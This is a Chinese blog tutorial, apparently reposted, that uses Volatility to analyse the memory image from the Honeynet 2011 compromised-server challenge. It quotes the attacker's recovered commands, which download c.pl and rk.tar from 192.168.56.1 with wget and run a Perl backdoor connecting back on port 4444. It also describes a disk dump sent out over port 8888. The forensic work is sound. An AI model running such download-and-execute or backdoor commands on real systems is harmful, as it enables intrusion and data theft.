kali 安装volatility_电子取证技术之实战Volatility工具
原标题:电子取证技术之实战Volatility工具
本文转载自公众号:安全龙
作者:beswing
Volatility 的安装
这次讲的是在linux下的取证,所以我安装的也是linux平台下的Volatility。在https://code.google.com/archive/p/volatility/ 下载源代码,或者使用我分享的源码,http://pan.baidu.com/s/1o8JOQV4 版本是2.6 linux下可以直接使用。如图:
图 (一)
另外,Kali自带了Volatility ,volatility在“应用程序”-“Kali Linux”-“数字取证中。
Volatility的实战分析
了解常用命令
从图一中,我们知道,我们可以通过 python vol.py -h查看帮助,获取常用的命令。例如
查看插件、地址空间、以及Profiles
基本操作
1
python vol.py -f [image] ‐profile=[profile][plugin]
加载镜像,以及加载相应的profile 加载插件。
需要特别说明的是,windows系统的profiles相当齐全,但是linux下的profile就得自己制作了,相应的制作方法,我们可以在https://code.google.com/p/volatility/wiki/LinuxMemoryForensics 看到,或者我们可以在https://github.com/KDPryor/LinuxVolProfiles](https://github.com/KDPryor/LinuxVolProfiles看到相应linux发行版本,以及相应系统内核的profile。
实战
我们在这里即将分析的镜像是Challenge 7 of the Forensic Challenge 2011 - Forensic Analysis of a Compromised Server的题目,我们可以在https://www.honeynet.org/challenges/2011_7_compromised_server 这下载到相应的镜像文件。
第一步 分析镜像文件
分析镜像文件,我们可以通过挂载的方式,来确定镜像的系统的版本,我们才可以制作相应的profile,或者搜索相应的profile。
我们先挂载镜像 mount -o loop victoria-v8.sda1.img /mnt 将镜像挂载到/mnt。
切换到/mnt 目录 root@kali:~/Desktop/volatility-master# cd /mnt
我们可以看到相应的系统文件。
1
cat etc/issue
查看系统版本
我们可以看到,镜像系统版本是 Debian 发行版 5.0
在 var/log目录下,
1
cat dmesg
我们可以获取相应的linux版本信息,如图,我们知道,系统内核版本是 2.6.26。
PS:dmesg用来显示开机信息,kernel会将开机信息存储在ring buffer中。您若是开机时来不及查看信息,可利用dmesg来查看。开机信息亦保存在/var/log目录中,名称为dmesg的文件里。
第二步 获取相应profile
我们有两种方法获取profile 。
第一,我们可以创建我们自己的profile。
Volatility自带一些windows系统的profile,Linux系统的Profile需要自己制作,制作的方法如下:
(实际是将module.dwarf和system.map打包成一个zip文件,接着将zip文件移动到 volatility/plugins/overlays/linux/ 中。)
Linux的Profile文件是一个zip的压缩包。
第二,我们可以利用搜索引擎或者已公开的profile,例如,我们就可以看到一些已经公布的profile。
我这里使用的是第二种方法,在公开的项目中找到了 Debian 5.0的profile
紧接着,我们需要将profile放入对应的位置
即放入目录 volatility/plugins/overlays/linux中。
然后,我们可以通过python vol.py --info来查看 是否真的加载profile了。
我们可以看到 profiles 中已经能看到 LinuxDebian5010x86了,这是我们压缩包的名字。
第三步 开始分析文件
1
python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 -h
可以看到针对linux镜像的命令,以及相应功能介绍。
通过
1
python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_psaux
我们可以查看进程。
我们可以发现一个可疑的nc 连接。 连接到 192.168.56.1 端口是 8888
通过
1
python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_netstat
我们可以查看各种网络相关信息,如网络连接,路由表,接口状态 等。
我们可以看到 与 292.168.56.1相关的网络连接情况,一个是4444端口,一个是8888端口,
通过
1
python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_bash
我们可以查看bash的历史记录
我们看到,通过scp命令复制了 exim4目录下的所有文件,另外,我们在/mnt/var/log/exim4 目录下的Exim reject log 中看到,
1
2
wget http://192.168.56.1/c.pl -O /tmp/c.pl
wget http://192.168.56.1/rk.tar -O /tmp/rk.tar; sleep 1000
两条命令,似乎从192.168.56.1下载了东西。
攻击者已经下载了两个文件c.pl和rk.tar,都在/ tmp中。
c.pl的简单分析表明,它是一个perl脚本,用于创建一个c程序,该程序编译给支持SUID的可执行文件
打开一个后门并向攻击者发送信息。
c.pl被下载,并且编译的SUID在端口4444中打开了一个到192.168.56.1的连接,如下所示:
1
wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444
以及,在python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_bash,我们还看到了攻击者一个奇怪的操作。
攻击者将 /dev/sda1整个dump下来,并通过 8888端口发送了出去。
Exim reject日志显示IP 192.168.56.101作为要发送邮件的主机:
abcde.com,owned.org和h0n3yn3t-pr0j3ct.com
1
2
3
H=(abcde.com) [192.168.56.101]
H=(0wned.org) [192.168.56.101]
H=(h0n3yn3t-pr0j3ct.com) [192.168.56.101]
我们在回过头去看
1
python vol.py -f ./victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_netstat
我们发现有两个已经关闭的连接。
1
2
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
这基本也显示了,192.168.56.101也是一个攻击IP。
我们之后通过上面的信息,知道攻击者是通过 Exim 成功攻击了这台服务器。通过搜索exim相关的漏洞我们基本可以确定 攻击是 CVE-2010-4344
此外,我们知道攻击者成功攻击了此台服务器,但是我们从
1
cat /mnt/var/log/auth.log |grep Failed
中看到
攻击者一直尝试以Ulysses的账户名登录,却没登录成功。
总结
攻击者可能只是一个脚本小子,利用已有的cve 公布了的exp 进入到了系统并没有成功登录账户其次 通过分析,我们可以知道攻击的发起 以及结束 并且我们了解到攻击者简单尝试了登录账户32次后就放弃了。
后记
虽然是很简短的一次分析,但是,我们也可以通过这次实践,了解到Volatility的魅力,以及取证的趣味~
-------------------------------------------------------------------------返回搜狐,查看更多
责任编辑:
kali 安装volatility_电子取证技术之实战Volatility工具相关推荐
- 电子取证技术的三大方向
电子取证技术的三大方向 作者:数据恢复网 文章来源: 时间:2006-12-11 13:13:20 阅读次数:437 计算机取证是对计算机犯罪证据的识别获取.传输.保存.分析和提交认证过程, ...
- kali 安装volatility_虚拟机安装|给你双倍快乐
又到了新的一期 今天给大家带来的这个软件 或许绝大部分普通人不知道 但是对于程序员来说 这是一个非常熟悉的software 那就是 看到这熟悉的图像,大部分程序员都知道是什么软件了吧.没错,它就是虚拟 ...
- 电子取证实例:基于文件系统的磁盘数据取证分析
0×1 简介 随着计算机犯罪个案数字不断上升和犯罪手段的数字化,搜集电子证据的工作成为提供重要线索及破案的关键.恢复已被破坏的计算机数据及提供相关的电子资料证据就是电子取证.NSTRT也曾协助进行过电 ...
- 网络安全应急响应-电子数据取证技术
网络安全应急响应专题文章: 1. 网络安全应急响应-日志分析技术 2. 网络安全应急响应-流量分析技术 3. 网络安全应急响应-恶意代码分析技术 4. 网络安全应急响应-终端检测与响应技术 5. 网络 ...
- 中国人民大学计算机取证,重邮举办全国计算机取证技术研讨会暨全国电子数据取证与司法鉴定挑战赛...
10月27日.28日,重庆邮电大学举行了第八届全国计算机取证技术研讨会暨全国电子数据取证与司法鉴定挑战赛.全国计算机取证相关专家云集. 中国科学院软件研究所研究员卿斯汉作了<从数据安全到健壮物联 ...
- 学计算机科学与技术当网警,“虚拟与现实的碰撞”|电子数据取证技术与公安工作主题讲座...
(来源:浙警院三大队) 原标题:"虚拟与现实的碰撞"|电子数据取证技术与公安工作主题讲座 2020/10/23 10月23日晚上,计信系张其前博士在滨江校区教学楼为网络安全与执法专 ...
- 2018-2019-2 《网络对抗技术》Kali安装 Week1 20165212
2018-2019-2 <网络对抗技术>Kali安装 Week1 20165212 1.完成安装linux kali和vm tools 装的第三遍成功安装.前面两次镜像文件不行,没驱动(网 ...
- 取证技术---电子数据取证技术基础知识点
@[电子数据取证技术] 概述 相关名称概念 电子数据 电子数据取证 取证基本流程 电子数据"身份证"----散列值 四大基本原则 常见基本概念 取证常见名词概念 反取证 国内外取证 ...
- 杂项题的基本解题思路——4、流量取证技术
流量包文件分析 流量包就是说我向你传递的时候,把你传递过程中的数据抓取下来,保存成一个文件 流量取证技术就是说:题目会给你一个流量包,你要在流量包里面找到相应的一些文件(有时候flag值就藏在流量包的 ...
最新文章
- 伍迷创意随想集 之 烧菜小帮手
- java中的doget_java servlet中doGet()和doPost()方法的用法和区别
- ubuntu下tftp的安装、配置、使用
- background 互联网图片_cssbackground-image和layer-background-image的区别
- 2021年中国动态密封市场趋势报告、技术动态创新及2027年市场预测
- cocos2dx shader 变灰 及 冰冻效果
- 使用 DUET/REFIND 方法将 NVME 添加为引导驱动器
- 车用总线技术 | 从另一种视角了解CAN FD
- 一起学爬虫(Python) — 03
- 树莓派添加开机自启动
- Oracle的sql基本语法总结(3)-- Oracle synonym 同义词的创建、查看、删除、作用
- 手机内存文件夹html,手机内存难清理?试试直接删掉这3个文件夹,网友:咋不早说?...
- 管理系统中计算机应用真题及答案文档,2013年4月管理系统中计算机应用真题及答案...
- 项目管理学习笔记之二.工作分解
- 怎么从扫描的PDF文档/图片里提取文字
- 牛客网第九场多校联赛 	E Music Game
- 让数据怎么发挥价值?先看看华为云数据使能的力量
- 写给成为高手之路上的朋友们
- Android清洁架构(一)
- C# 如何检测UDP是否被占用_软启动是否故障如何判断及不同故障检测维修办法
热门文章
- java编程如何 实现8开立方等于2_Java之Math类使用小结
- 基于JAVA+SpringMVC+Mybatis+MYSQL的社区养老服务网站
- 电力与计算机科学技术,上海电力大学计算机科学与技术专业
- linux系统修改用户名密码忘记,Linux下修改/找回root密码
- jsp点击文字改变颜色_这样给图片添加上文字、诗词、歌词,超吸睛
- click 在网页测试手机模式下无效,不能执行。调成非手机模式即可
- 树形数据深度排序处理示例(模拟单编号法).sql
- ADO数据库常用操作
- 转:Discuz!NT负载均衡解决方案(HA)之---LVS(Linux Virtual Server)
- 从零开始学前端:定位 --- 今天你学习了吗?(CSS:Day17)